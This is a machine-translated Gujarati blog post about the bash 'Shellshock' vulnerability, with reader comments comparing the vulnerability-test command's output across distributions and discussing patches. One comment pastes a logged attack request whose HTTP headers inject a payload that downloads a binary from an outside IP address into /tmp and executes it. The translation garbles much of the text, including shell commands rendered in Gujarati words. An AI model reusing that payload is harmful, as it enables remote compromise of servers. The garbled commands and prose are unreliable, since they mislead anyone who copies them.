બાસ: નવી નબળાઈ મળી (અને નિશ્ચિત)

તે કેટલાક બ્લોગ્સ પર જંગલની અગ્નિની જેમ ચાલે છે, માં પ્રકાશિત એક સમાચાર સુરક્ષા બ્લોગ de લાલ ટોપી વૈશ્વિક ચલોના દુરૂપયોગને લીધે બાસમાં મળેલી નબળાઈ વિશે. મૂળ સમાચાર મુજબ:

“… નબળાઈ એ હકીકતને કારણે છે કે તમે બેશ શેલને બોલાવતા પહેલા ખાસ રચિત મૂલ્યો સાથે પર્યાવરણ ચલો બનાવી શકો છો. આ ચલોમાં કોડ શામેલ હોઈ શકે છે જે શેલ શરૂ થતાંની સાથે જ અમલમાં મૂકવામાં આવે છે. આ વિસ્તૃત ચલોનું નામ વાંધો નથી, ફક્ત તેમની સામગ્રી. પરિણામે, આ નબળાઈ ઘણા સંદર્ભોમાં ખુલ્લી પડી છેઉદાહરણ તરીકે:

  • ફોર્સકોમંડ દૂરસ્થ વપરાશકર્તાઓ માટે મર્યાદિત આદેશ અમલીકરણ ક્ષમતાઓ પ્રદાન કરવા માટે તેનો ઉપયોગ sshd રૂપરેખાંકનોમાં થાય છે. આ દોષનો ઉપયોગ તે ટાળવા અને મનસ્વી આદેશ અમલ આપવા માટે કરી શકાય છે. કેટલાક ગિટ અને સબવર્ઝન અમલીકરણો આવા પ્રતિબંધિત શેલોનો ઉપયોગ કરે છે. ઓપનએસએચએચના નિયમિત ઉપયોગને અસર થતી નથી કારણ કે વપરાશકર્તાઓને પહેલાથી જ કન્સોલની .ક્સેસ છે.
  • જો ModCc અથવા Mod_cgid નો ઉપયોગ કરીને અપાચે સર્વર અસરગ્રસ્ત થાય છે જો CGI સ્ક્રિપ્ટો બેશ અથવા સ્પawnન સબબિવલ્સ બંનેમાં લખેલી હોય. પીએચપીમાં સિસ્ટમ / એક્ઝેક્યુટ શેલ વાપરી રહ્યા હોય, તો આવા સુબલવેલ્સ સી / માં સિસ્ટમ / પોપન દ્વારા, પાયથોનમાં ઓએસ.સિસ્ટમ / ઓએસ.પોપેન દ્વારા સ્પષ્ટ રીતે ઉપયોગમાં લેવાય છે. (જ્યારે સીજીઆઈ મોડમાં ચાલી રહ્યા હોય), અને પર્લમાં ખુલ્લી / સિસ્ટમ (જે આદેશ શબ્દમાળા પર આધારીત છે).
  • Mod_php સાથે ચલાવાયેલ PHP સ્ક્રિપ્ટો અસર થતી નથી ભલે sublevels ભજવવામાં આવે.
  • સંભવિત દૂષિત સર્વરથી લેવામાં આવેલા મૂલ્યો સાથે, DHCP ક્લાયન્ટો સિસ્ટમને ગોઠવવા માટે શેલ સ્ક્રિપ્ટોની માંગ કરે છે. આ DHCP ક્લાયંટ મશીન પર, સામાન્ય રીતે રૂટ તરીકે, મનસ્વી આદેશો ચલાવવા માટે પરવાનગી આપશે.
  • SID વિશેષાધિકારોવાળા વિવિધ ડિમન અને પ્રોગ્રામ, વપરાશકર્તા દ્વારા પ્રભાવિત / પર્યાવરણીય ચલ મૂલ્યો સાથે શેલ સ્ક્રિપ્ટો ચલાવી શકે છે, જે મનસ્વી આદેશો ચલાવવા માટે પરવાનગી આપે છે.
  • અન્ય કોઈપણ એપ્લિકેશન કે જે શેલને હૂક કરે છે અથવા શેલ સ્ક્રિપ્ટ ચલાવે છે જેમ કે બેશને ઇન્ટરપ્રિટર તરીકે વાપરવા માટે. શેલ સ્ક્રિપ્ટ્સ કે જે ચલોનું નિકાસ કરતી નથી, તેઓ આ સમસ્યા માટે સંવેદનશીલ નથી, ભલે તેઓ અવિશ્વસનીય સામગ્રી પર પ્રક્રિયા કરે અને તેમાં સ્ટોર કરે શેલ ચલો (ડાબે) અને sublevels ખુલે છે.

… ”

કેવી રીતે જાણવું કે મારા બેશને અસર થઈ છે?

આપેલ છે, તે જાણવાની ખૂબ જ સરળ રીત છે કે શું આપણે આ નબળાઈથી પ્રભાવિત છીએ. હકીકતમાં, મેં મારા એન્ટાર્ગોસ પર પરીક્ષણ કર્યું અને દેખીતી રીતે મને કોઈ સમસ્યા નથી. આપણે ટર્મિનલ ખોલીને મુકવું છે:

env x = '() {:;}; ઇકો નબળાઈવાળા 'bash -c "ઇકો આ એક કસોટી છે

જો તે આ રીતે બહાર આવે છે તો અમને કોઈ સમસ્યા નથી:

env x = '() {:;}; ઇકો નબળાં 'બેશ-સી "ઇકો આ એક પરીક્ષણ છે" બેશ: ચેતવણી: x: ફંક્શન ડેફિનેશન પ્રયત્નોનો ઉપેક્ષા

જો પરિણામ જુદું હોય, તો તમારે પેચ લાગુ કર્યું છે કે કેમ તે જોવા માટે તમારે અમારી પસંદીદા વિતરણોના અપડેટ ચેનલોનો ઉપયોગ કરવો જોઈએ. તેથી તમે જાણો છો 😉

અપડેટ: આ ઉબુન્ટુનો ઉપયોગ કરીને સહકાર્યકરોનું આઉટપુટ છે 14:04:

env x = '() {:;}; ઇકો નબળાઈવાળા 'bash -c "ઇકો આ એક પરીક્ષણ છે" સંવેદનશીલ આ એક પરીક્ષણ છે

તમે જોઈ શકો છો, અત્યાર સુધી તે સંવેદનશીલ છે.


તમારી ટિપ્પણી મૂકો

તમારું ઇમેઇલ સરનામું પ્રકાશિત કરવામાં આવશે નહીં. આવશ્યક ક્ષેત્રો સાથે ચિહ્નિત થયેલ છે *

*

*

  1. ડેટા માટે જવાબદાર: મિગ્યુએલ gelંજેલ ગેટóન
  2. ડેટાનો હેતુ: નિયંત્રણ સ્પામ, ટિપ્પણી સંચાલન.
  3. કાયદો: તમારી સંમતિ
  4. ડેટાની વાતચીત: કાયદાકીય જવાબદારી સિવાય ડેટા તૃતીય પક્ષને આપવામાં આવશે નહીં.
  5. ડેટા સ્ટોરેજ: cસેન્ટસ નેટવર્ક્સ (ઇયુ) દ્વારા હોસ્ટ કરેલો ડેટાબેઝ
  6. અધિકાર: કોઈપણ સમયે તમે તમારી માહિતીને મર્યાદિત, પુન recoverપ્રાપ્ત અને કા deleteી શકો છો.

  1.   ગર્સન જણાવ્યું હતું કે

    મારી પાસે 14.04 માંથી કુબન્ટુ 64 છે અને હું પણ મેળવી શકું છું:

    env x = '() {:;}; ઇકો નબળાઈવાળા 'bash -c "ઇકો આ એક કસોટી છે
    નબળા
    આ એક કસોટી છે

    મેં પહેલેથી જ અપડેટ કર્યું છે, પરંતુ તે ઠીક નથી. શુ કરવુ?

    1.    ઇલાવ જણાવ્યું હતું કે

      તેમના અપડેટ થવાની રાહ જુઓ. પહેલેથી જ ઉદાહરણ તરીકે ઇઓએસ અપડેટ થયેલ છે .. 😀

    2.    જુઆન જણાવ્યું હતું કે

      કેટલું વિચિત્ર છે, મારી પાસે કુબન્ટુ 14.04 પણ છે

      $ env x = '() {:;}; ઇકો નબળાં 'બેશ-સી "ઇકો આ એક કસોટી છે
      bash: ચેતવણી: x: ફંક્શન વ્યાખ્યા પ્રયાસને અવગણીને
      bash: `x 'માટે કાર્ય વ્યાખ્યા આયાત કરવામાં ભૂલ
      આ એક કસોટી છે

      1.    જુઆન જણાવ્યું હતું કે

        હું ઉમેરું છું કે આજે ડાઉનલોડ થયેલ "બેશ" પેકેજનું સંસ્કરણ છે:
        4.3-7બુન્ટુ ૧.૨

        http://packages.ubuntu.com/trusty/bash

    3.    ઇલિયોટાઇમ 3000 જણાવ્યું હતું કે

      મારા કિસ્સામાં, આદેશ આપીને, તે મને ફક્ત ટર્મિનલમાં નીચે આપેલ બાબતો આપે છે.

      >

      તો પણ, મજાક એ છે કે મેં ડેબિયન વ્હીઝીને અપડેટ કર્યું અને તે જ મને ડૂબી ગયું.

      1.    યુકીતો જણાવ્યું હતું કે

        Wheezy હજી પણ બગના બીજા ભાગ માટે સંવેદનશીલ છે, ઓછામાં ઓછું બપોરે (UTC -4: 30) સમસ્યા હજી પણ નીચેની છે: /

  2.   પીટરશેકો જણાવ્યું હતું કે

    મેં હમણાં જ ચકાસ્યું કે આજે સવારે અપડેટ લાગુ કર્યા પછી સ્લેકવેર, ડેબિયન અથવા સેન્ટોસને અસર થશે નહીં કારણ કે તેમને અનુરૂપ અપડેટ મળ્યું છે.

    આ સમયે ઉબુન્ટુ હજી પણ સંવેદનશીલ બને છે? અને મને કહો કે તે સલામત છે: ડી.

    1.    જુઆન જણાવ્યું હતું કે

      પરંતુ શું તમે ઉબુન્ટુને અપડેટ કરવાનો પ્રયાસ કર્યો છે?
      આજના અપડેટ સાથે તેઓએ તેને પણ ઠીક કરી દીધું છે.

      1.    પીટરશેકો જણાવ્યું હતું કે

        OK

    2.    રોબોટ જણાવ્યું હતું કે

      સુરક્ષા નિષ્ણાતો 'બાશ' ની નબળાઈ અંગે ચેતવણી આપે છે, તે હાર્ટલેડ દોષ કરતા લિનક્સ સ Softwareફ્ટવેરના વપરાશકર્તાઓ માટે વધારે ખતરો ઉભો કરી શકે છે, જ્યાં 'હેકર્સ' સિસ્ટમનો સંપૂર્ણ નિયંત્રણ મેળવવા માટે બાશમાં બગનો ઉપયોગ કરી શકે છે.
      ટોડ બેઅર્ડસ્લે, સાયબરસક્યુરિટી ફર્મ રેપિડ 7 ના એન્જિનિયરિંગ મેનેજર, ચેતવણી આપી હતી કે દોષને તેની તીવ્રતા માટે 10 રેટિંગ આપવામાં આવ્યું હતું, એટલે કે તેનો મહત્તમ પ્રભાવ પડે છે, અને શોષણની જટિલતા માટે "નીચા" રેટિંગ આપવામાં આવે છે, જેનો અર્થ 'હેકર' હુમલા માટે પ્રમાણમાં સરળ છે. . આ નબળાઈનો ઉપયોગ કરીને, હુમલાખોરો theપરેટિંગ સિસ્ટમનો સંભવિત નિયંત્રણ લઈ શકે છે, ગોપનીય માહિતીને accessક્સેસ કરી શકે છે, ફેરફારો કરી શકે છે અને વધુ, "બેઅર્ડસ્લેએ જણાવ્યું હતું. તેમણે ઉમેર્યું, "બશ પર કબજો મેળવનાર સિસ્ટમ્સવાળા કોઈપણને તરત જ પેચ લાગુ કરવું જોઈએ."
      આ અસ્થિરતા પહેલાં કે બેચ હોસ્ટ કરેલા ઓલ્ડ ટૂલ (જીએનયુ) ને પ્રસ્તુત કરે છે, લિનક્સ સ Softwareફ્ટવેરને જીએનયુથી છૂટકારો મેળવવા અને બીએસડી ટૂલ બદલવા માટે વધુ અનુકૂળ રહેશે.

      પીએસ: મારી અભિવ્યક્તિની સ્વતંત્રતાને સેન્સર ન કરો, ... કોઈનું અપમાન ન કરો, ... મારો સંદેશ ભૂતપૂર્વ સંદેશ જેવા કા Iી નાખો કે જે મેં કા deletedી નાખ્યો છે !.

      1.    ઝેરીક્સ જણાવ્યું હતું કે

        ઓહ કૃપા કરીને, તેને વધારે ન કરો. હું તે લોકોને કેવી રીતે નફરત કરું છું જેઓ બીએસડીનો ઉપયોગ કરે છે અને જીએનયુ, લિનક્સ અથવા આ પ્રોજેક્ટ્સમાંથી જે પણ આવે છે તેને ધિક્કારશે.

      2.    પીટરશેકો જણાવ્યું હતું કે

        હું તમારી સાથે છું અને તમે આ છિદ્રની ગંભીરતા માટે એકદમ યોગ્ય છો.

      3.    ડાયઝેપન જણાવ્યું હતું કે

        તે સેન્સરશીપ નહોતી, તે રીડન્ડન્સી હતી (તમે જીનોમ 3.14.૧XNUMX પોસ્ટમાં આ જ ટિપ્પણી કરી હતી)

      4.    સ્ટાફ જણાવ્યું હતું કે

        «… અને શોષણની સંપૂર્ણતા માટે 'ઓછું' રેટ કર્યું, જેનો અર્થ તે હેકરના હુમલા માટે પ્રમાણમાં સરળ છે»

        શું અસંગતતા નોંધનીય છે?
        નબળાઈઓનું શોષણ કરવું કેવી રીતે સરળ છે અને તે જ સમયે "નીચા" સ્તરનું જોખમ હોઈ શકે છે કારણ કે તે વાપરવા માટે ખૂબ જટિલ છે?
        તે એક ભૂલ છે જે એકબીજાને જાણ્યાના કલાકોમાં હલ થઈ ગઈ હતી અને, જેમ કે, હાર્દિકની જેમ શોષણ કરવામાં આવી હોવાના કોઈ અહેવાલો નથી (અલબત્ત, એકબીજાને જાણવાનો આ સમય ઓછો છે).
        તે વાસ્તવિક જોખમ કરતાં વધુ ટેબ્લોઇડ પ્રેસ છે.

      5.    પીટરશેકો જણાવ્યું હતું કે

        શું @ સ્ટtaફ તમને મહત્વપૂર્ણ નથી લાગતું? હવે તું મને શું કહેશે?

        GET./.HTTP/1.0
        .ઉપયોગકર્તા: એજન્ટ.-રોબ
        .કુકી: ().:.:.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .હોસ્ટ: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .રેફરર: ().:.;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        . સ્વીકારો:. * / *

        n ફાઇલ એનજીએક્સ
        એનજીએનએક્સ: ઇએનએફ 32-બીટ એલએસબી એક્ઝેક્યુટેબલ, ઇન્ટેલ 80386, વર્ઝન 1 (એસવાયએસવી), જીએનયુ / લિનક્સ 2.6.18 માટે સ્થિર રીતે જોડાયેલ, છીનવી લેવામાં

        $md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $sha256sum nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        તમે જાણો છો તે શું છે? થોડું ખતરનાક કંઈ નથી ...

      6.    યુકીતો જણાવ્યું હતું કે

        પરિસ્થિતિ એકદમ ગંભીર છે, પરંતુ ત્યાંથી એમ કહેવું કે તમારે બીએસડી વિકલ્પ માટે બાશનો ઉપયોગ કરવાનું બંધ કરવું જોઈએ, તે પહેલેથી જ છે, કોઈપણ રીતે અપડેટ પહેલાથી જ છે, હું ફક્ત અપડેટને ટચ કરું છું અને બીજું કંઈ નહીં.

        હવે પી.ડી., મને લાગે છે કે તે @robet ના સાથીદાર છે, મને નથી લાગતું કે અહીંના સંચાલકો આ પ્રકારની ટિપ્પણીઓને કાtingી નાખવા માટે સમર્પિત છે કારણ કે હા, કારણ કે મેં આ સમુદાયમાં ભાગ લીધો હોવાથી મને તે લાગણી થઈ છે અને મને આશા છે કે તે રીતે રહે છે.

        શુભેચ્છાઓ.

      7.    ઇલાવ જણાવ્યું હતું કે

        તમે એક જ ટિપ્પણી બે અલગ અલગ પોસ્ટ્સ પર મૂકી છે. જો તમે સમાચારોના "સ્રોત" ને પ્રોત્સાહન આપવાનો પ્રયાસ કરી રહ્યાં છો, તો માફ કરશો, આ તે સ્થાન નથી.

      8.    મારિયો જણાવ્યું હતું કે

        બાશ યુનિક્સ (અને તેનું જીએનયુ ક્લોન) માંથી આવે છે. ઓએસએક્સ જેવી બીએસડી આધારિત સિસ્ટમો પણ અસરગ્રસ્ત છે, અને ગેનબેતાના જણાવ્યા મુજબ, તેઓએ હજી સુધી આનો ઉપાય કર્યો નથી. તેવી જ રીતે, બાસને toક્સેસ કરવા માટે તમારે સ્થાનિક એકાઉન્ટ અથવા એસએસએચ દ્વારા વપરાશકર્તા ખાતુંની જરૂર છે.

      9.    યુકીતો જણાવ્યું હતું કે

        @સ્ટાફ:

        1.- બગ દ્વારા અસરગ્રસ્ત સેવાઓની માત્રાને લીધે તે સ્તર 10 (જોખમના મહત્તમ સ્તર) તરીકે વર્ગીકૃત કરવામાં આવ્યું છે. મુખ્ય નોંધમાં તેઓ તે હકીકતને ખૂબ જ સ્પષ્ટ કરે છે, એવી દલીલ કરે છે કે ભૂલ અપાચે, એસએસડીડી, સુઈડ પરમિશનવાળા પ્રોગ્રામ્સ (xorg, અન્ય લોકો) જેવી સેવાઓ પર અસર કરી શકે છે.

        2.- તેને નીચલા સ્તરના મુશ્કેલી તરીકે વર્ગીકૃત કરવામાં આવે છે, જ્યારે તે તેના અમલીકરણની વાત આવે છે, અને આનું ઉત્તમ ઉદાહરણ એ નબળાઈ પરીક્ષણ સ્ક્રિપ્ટ છે જે @ ઇલાવ દ્વારા પોસ્ટમાં મૂકવામાં આવ્યું છે. અમલમાં મૂકવું ખૂબ મુશ્કેલ નથી, તમે જોઈ શકો છો.

        મને માહિતીમાં અતિરિક્તતા દેખાતી નથી (હું ફક્ત એક Google અનુવાદ જોઉં છું) અને જો સમસ્યા એકદમ ગંભીર છે, અને તમે કહો છો તેમ, તેમાં પહેલેથી જ પેચ અને સોલ્યુશન છે, પરંતુ તે માટે નહીં, તે હવે જોખમ નથી, અને એકદમ વાસ્તવિક.

      10.    સ્ટાફ જણાવ્યું હતું કે

        @petercheco / @ યુકીટરુ

        મારો ખોટો અર્થઘટન ન કરો, મને લાગે છે કે તે સ્પષ્ટ છે કે મારી ટીકા એ સમાચારો છે કે જે રોબિટ લિંક્સ કરે છે અને અસંગતતા પર ધ્યાન કેન્દ્રિત કરે છે, અતિશયતાને નહીં.

        તે જ રીતે, આપણે જોખમ અને જોખમ વચ્ચે તફાવત હોવું જોઈએ (હું પછીનાનો ઉલ્લેખ કરતો નથી), આપણે સામાન્ય રીતે સમાનાર્થી તરીકે તેનો ઉપયોગ કરીએ છીએ, પરંતુ અહીં, જોખમ બગની ક્ષતિગ્રસ્ત ક્ષમતા હશે અને તેની ઘટનાની સંભાવનાનું જોખમ લેશે.
        મારા વિશેષ કિસ્સામાં, હું ગઈકાલથી દાખલ થયો. તે મેઇલિંગ સૂચિઓ અથવા તેના જેવા કંઈપણ માટે નહોતું. તે ડેસ્કટ !પ ડિસ્ટ્રો માટે હતું! મેં કડી સાથે ફોન ઉપાડ્યો અને સિસ્ડામિનને એક સંદેશ મોકલ્યો અને મેં પુષ્ટિ કરી કે મારી પાસે બધું પેચ છે, પછી મને માફ કરશો પરંતુ આ સમાચાર મને જાગૃત રાખતા નથી.

      11.    રોબોટ જણાવ્યું હતું કે

        અન્ય ફોરમમાં તેઓ બ Bashશની નબળાઈ વિશે ઉલ્લેખ કરે છે, "ડેબિયન અને ઉબુન્ટુએ જે નિરાકરણ બહાર પાડ્યું", પરંતુ આજે તેઓએ શોધી કા !્યું કે નબળાઈ હજી પણ અસ્તિત્વમાં છે, તેથી સોલ્યુશન અપૂર્ણ હતું, તેઓએ ઉલ્લેખ કર્યો છે કે!

        હું જોઉં છું કે લોકોએ નબળાઈની તીવ્રતાથી બચવા માટેની સરળ હકીકત માટે મારી ટીકા કરી છે - મહત્તમ જોખમી સ્તરના 10 સાથે ક્વોલિફાઇ, અને બાશ હોસ્ટ કરેલા જૂના જીએનયુ ટૂલ પહેલાં લિનક્સ સોફ્ટવેરના સંભવિત ઉકેલોનો ઉલ્લેખ કરે છે - જે સંપૂર્ણ રીતે જી.એન.યુ. લિનક્સ સ Softwareફ્ટવેરમાં બીએસડી ટૂલથી બદલી શકાય છે,… હું લિનક્સનો પણ ઉપયોગ કરું છું અને મને લિનક્સ ગમે છે!

        હું સ્પષ્ટ કરું છું કે બાસ બીએસડીમાં ડિફ defaultલ્ટ ઇન્સ્ટોલ કરેલા નથી, તે બીએસડીમાં ઇન્સ્ટોલ કરી શકાય તેવું વધુ એક લિનક્સ સુસંગતતા પેકેજ છે ... હા! અને સ્રોત મૂકવામાં આવ્યો છે જેથી તેઓ સમાચાર ચકાસી શકે, કારણ કે ઘણા વપરાશકર્તાઓ કેટલીકવાર સંદેશ અથવા ટિપ્પણી પર વિશ્વાસ કરતા નથી.

        1.    ઇલાવ જણાવ્યું હતું કે

          રોબેટ: જેમ જેમ તેઓ તમને પહેલાથી જ વારંવાર કહે છે, તમે પહેલેથી જ એક પોસ્ટમાં સમાચારો સાથે તમારી ટિપ્પણી મૂકી છે, તમારે ટિપ્પણી કરેલી દરેક પોસ્ટમાં તમારે તેને મૂકવાની જરૂર નથી.

          બાશ વિશે, ત્યાં અન્ય શેલો છે જેનો ઉપયોગ બાશ નબળાઈ હોવા પર થઈ શકે છે. 😉

      12.    મારિયો જણાવ્યું હતું કે

        રોબેટ, મારા જ્ knowledgeાન મુજબ, ત્યાં કોઈ સ softwareફ્ટવેર નથી જે લિનક્સ કર્નલને BSD વપરાશકર્તાલેન્ડ સાથે જોડે છે. નજીકની વસ્તુ એ બીજી બાજુ છે, જેમ્સુ અને ડેબિયન જેવા કેબીએસડી + જીએનયુ. આ ઉપરાંત, જી.એન.યુ (1983) બીએસડી (1977) પછીની હોય તો તેને "ઓલ્ડ-ફેશન" કહેવાતા નહીં. તે બંને તેમના યુનિક્સ રુટને શેર કરે છે (પરંતુ કોડ નહીં), ત્યાં કોઈ "લિનક્સ સુસંગતતા" હોત નહીં જો લિનસ ટી હજી બાળક હતો ત્યારે બાશ બનાવવામાં આવ્યો હતો.

  3.   મેન્યુઅલપીરેઝફ જણાવ્યું હતું કે

    ffફ, આ સમયે ડિબિયન પરીક્ષણ એ "સંવેદનશીલ" છે કે આપણી પાસેની એક લાંબી ઝલક ...

    1.    mrcelhw જણાવ્યું હતું કે

      હું ડેબિયન પરીક્ષણનો ઉપયોગ કરું છું અને આ શાખામાં પણ અમને બેશ અપડેટ પ્રાપ્ત થયું છે

  4.   ડાયઝેપન જણાવ્યું હતું કે

    Genbeta અનુસાર ત્યાં બીજી નબળાઈ પણ છે
    http://seclists.org/oss-sec/2014/q3/685

    ક્વેરી કરવાનો આદેશ છે
    env X = '() {(a) => sh' sh -c "ઇકો સંવેદનશીલ"; bash -c "ઇકો નિષ્ફળતા 2 અનપેચડ"

    1.    ઇલાવ જણાવ્યું હતું કે
      env X = '() {(a) => sh' sh -c "ઇકો સંવેદનશીલ"; bash -c "ઇકો અનપેચડ નિષ્ફળતા 2" sh: X: લીટી 1: અનપેક્ષિત તત્વની નજીકની સિન્ટેક્ટિક ભૂલ `= 'sh: X: લીટી 1:`' sh: `X 'sh માટે કાર્ય આયાત કરવામાં ભૂલ - સંવેદનશીલ - નિષ્ફળતા 2 અનપેચ આદેશ નથી મળ્યો
      
      1.    ડાયઝેપન જણાવ્યું હતું કે

        એ જ મને.

      2.    ગિસકાર્ડ જણાવ્યું હતું કે

        અહીં જ. પરંતુ પોસ્ટમાં મૂળ ભૂલ (એલ) ઉબુન્ટુ 14.04 માં પેચ કરવામાં આવી હતી

      3.    x11tete11x જણાવ્યું હતું કે

        કોઈ સરળ પડઘાને બદલે તેને વિશેષજ્ anોની આવશ્યક સૂચનાને અમલમાં મૂકવાનો પ્રયત્ન કરવાને બદલે, હું "અપૂરતી વિશેષાધિકારો" ફેંકીશ ... આ ભૂલ વિશેષાધિકારોમાં વધારો કરતું નથી? જો તે વિશેષાધિકારો વધારતો નથી, તો તે તે ખતરનાક નથી જેટલું તેઓ તેને દોરે છે.

      4.    ઝુર્ક્સો જણાવ્યું હતું કે

        તમે સાચા છો!! તેઓ બે નબળાઈઓ હતી ...

        મારા માટે લિનક્સ મિન્ટ 17 માં બીશ બેશ અપડેટ પછી જે તેઓએ ઉબુન્ટુ રિપોઝીટરીઓમાં ગઈરાત્રે મૂકી દીધા, શેલ આ આઉટપુટ આપે છે તે આદેશ ચલાવીને:

        env X = '() {(a) => sh' sh -c "ઇકો સંવેદનશીલ"; bash -c "ઇકો નિષ્ફળ 2 અનપેચડ"
        >

        પાછલા એકને અપડેટ કરવા ઉબુન્ટુ રીપોઝીટરીઓમાં મૂકવામાં આવેલ "બાશ" ની સંસ્કરણ છે:

        4.3-7બુન્ટુ ૧.૨

        ડેબિયન ડેરિવેટ સિસ્ટમ્સ પર તમે આ આદેશ સાથે ઇન્સ્ટોલ કરેલું સંસ્કરણ ચકાસી શકો છો:

        dpkg -s bash | ગ્રેપ સંસ્કરણ

        કોઈ પણ સંજોગોમાં, તે સ્પષ્ટ થવું જોઈએ, ઓછામાં ઓછું ડેબિયન, ઉબુન્ટુ અને મિન્ટ વપરાશકર્તાઓ માટે; તમારે પ્રોગ્રામો વિશે વધુ ચિંતા ન કરવી જોઈએ કે જે #! / Bin / sh હેડર સાથે સ્ક્રિપ્ટો ચલાવે છે કારણ કે તે વિતરણો પર / બિન / sh "બેશ" કહેતા નથી, પરંતુ શેલને "ડ dશ" સાથે જોડે છે (આડંબર છે :)

        ડેબિયન cheલકમિસ્ટ કન્સોલ (આડંબર) એક ડેરિવેટેડ પોસીક્સ કન્સોલ છે
        રાખ ના.
        .
        કારણ કે તે સ્ક્રિપ્ટોને બાશ કરતા ઝડપી ચલાવે છે, અને તેના પર નિર્ભરતા ઓછી છે
        લાઇબ્રેરીઓ (સ failફ્ટવેર નિષ્ફળતા સામે તેને વધુ મજબૂત બનાવે છે અથવા
        હાર્ડવેર), તે સિસ્ટમો પર ડિફોલ્ટ સિસ્ટમ કન્સોલ તરીકે વપરાય છે
        ડેબિયન.

        તેથી, ઓછામાં ઓછા ઉબુન્ટુમાં, "બેશ" નો ઉપયોગ વપરાશકર્તા પ્રવેશ માટે શેલ તરીકે થાય છે (રૂટ વપરાશકર્તા માટે પણ). પરંતુ કોઈપણ વપરાશકર્તા મૂળભૂત રીતે બીજા શેલનો ઉપયોગ વપરાશકર્તા અને રૂટ કન્સોલ (ટર્મિનલ્સ) માટે કરી શકે છે.

        શેલ આ આદેશો ચલાવીને સ્ક્રિપ્ટો (#! / બિન / શ) ચલાવે છે તે તપાસવું સરળ છે:

        ફાઇલ / બિન / શ
        (આઉટપુટ / બિન / શ: symbol ડ`શ સાથે સાંકેતિક લિંક છે) આપણે આદેશ પુનરાવર્તિત ટ્રેસને અનુસરીએ છીએ

        ફાઇલ / ડબ્બા / આડંબર
        (આઉટપુટ એ / બિન / ડashશ છે: ELF 64-bit LSB શેર્ડ sharedબ્જેક્ટ, x86-64, સંસ્કરણ 1 (SYSV) તેથી આ એક્ઝેક્યુટેબલ છે.

        આ લિનક્સ મિન્ટ 17 વિતરણ પરનાં પરિણામો છે અન્ય નોન-ઉબુન્ટુ / ડેબિયન-આધારિત વિતરણો પર તે જુદા હોઈ શકે છે.

        ડિફોલ્ટ શેલ બદલવું મુશ્કેલ નથી !! તમે વપરાશકર્તાઓ માટે અને રુટ વપરાશકર્તા માટે અલગનો ઉપયોગ કરી શકો છો. ખરેખર, તમારે ફક્ત તમારી પસંદનું શેલ સ્થાપિત કરવું પડશે અને "chsh" આદેશથી અથવા / etc / passwd ફાઇલમાં ફેરફાર કરીને ડિફ defaultલ્ટ બદલવું પડશે (જોકે એવા વપરાશકર્તાઓ કે જેઓ "પાસડબલ્યુડી" ફાઇલને સંપાદિત કરતી વખતે ભૂલના પરિણામો જાણતા નથી, શું તે વધુ સારું છે કે તેઓ પોતાને ખૂબ સારી રીતે જાણ કરે અને તેનું સંપાદન કરતાં પહેલાં, તેને પુન recoverપ્રાપ્ત કરવું જરૂરી હોય તો અસલની એક નકલ બનાવો).

        હું "tcsh" થી વધુ આરામદાયક અનુભવું છું (tcsh છે :)

        ટેનએક્સ સી કન્સોલ, બર્કલે સીએસએસનું સુધારેલું સંસ્કરણ

        "સીએસએસ" એ છે જે મેક ઓએસ એક્સએ થોડા વર્ષો પહેલા ઉપયોગમાં લીધું હતું. Appleપલની operatingપરેટિંગ સિસ્ટમનો મોટા ભાગનો ફ્રીબીએસડી કોડ છે તે ધ્યાનમાં લેતાં કંઈક તાર્કિક છે. ગઈકાલે મેં જે વાંચ્યું તેમાંથી, લાગે છે કે તેઓ વપરાશકર્તા ટર્મિનલ્સ માટે "બેશ" પણ પ્રદાન કરે છે.

        નિષ્કર્ષ:

        - પેચેડ "બેશ" વર્ઝન "સૌથી વધુ ઉપયોગમાં લેવાતા ડિસ્ટ્રિબ્યુશન" માટે પહેલાથી જ વિતરણ કરવામાં આવ્યું છે
        - "બેશ" સંસ્કરણ 4.3-7ubuntu1.2 અને પછીના સમયમાં આ ભૂલો શામેલ નથી
        ઓએસ * લિનક્સમાં "બેશ" નો ઉપયોગ કરવો ફરજિયાત નથી
        થોડા * લિનક્સ વિતરણો લિંક #! / બિન / શ "બાશ" સાથે
        - ત્યાં વિકલ્પો છે: રાખ, આડંબર, સીએસએસ, ટીસીશ અને કેટલાક વધુ
        - ટર્મિનલ ખોલતી વખતે સિસ્ટમ કહે છે તે ડિફ shellલ્ટ શેલ બદલવાનું મુશ્કેલ નથી
        - થોડા નાના ઉપકરણો (રાઉટર્સ અને અન્ય) "બેશ" નો ઉપયોગ કરે છે, કારણ કે તે ખૂબ મોટું છે !!

      5.    ઝુર્ક્સો જણાવ્યું હતું કે

        હમણાં બીજું અપડેટ આવ્યું છે જે "બેશ" નું બીજું સંસ્કરણ ઇન્સ્ટોલ કરે છે 4.3-7ubuntu1.3

        લિનક્સ મિન્ટ 17 અને ઉબુન્ટુ 14.04.1 એલટીએસ માટે

        1.    ઇલાવ જણાવ્યું હતું કે

          આર્કલિંક્સે વર્ઝન બેશ -4.3.026-1 દાખલ કર્યું છે

    2.    રોબોટ જણાવ્યું હતું કે

      @ ઝુર્ક્સો… .બર્કલેથી કcશ ?,… હું ઉપરથી જે બોલું છું તે તમે સમજો છો, અને બાસ હોસ્ટ કરેલા જૂના જીએનયુ ટૂલને બદલે BSD “csh” નો ઉપયોગ કરવો વધુ સારું છે. તે સાધન લિનક્સ સ Softwareફ્ટવેર માટે શ્રેષ્ઠ છે.

  5.   નામ વગરનું જણાવ્યું હતું કે

    મને લાગે છે કે આ બગ છે

    https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760

    સાચું?

  6.   ગોઝલા જણાવ્યું હતું કે

    અને સમાધાન શું હશે?

    1.    ઇલાવ જણાવ્યું હતું કે

      તમારા ડિસ્ટ્રો on પરના પેકેજને અપડેટ કરવા માટે તેમની રાહ જુઓ

  7.   ડાયઝેપન જણાવ્યું હતું કે

    ભૂલ શેલશોક તરીકે બાપ્તિસ્મા પામી હતી
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   પાબ્લો ઇવાન કોરિયા જણાવ્યું હતું કે

    નબળા
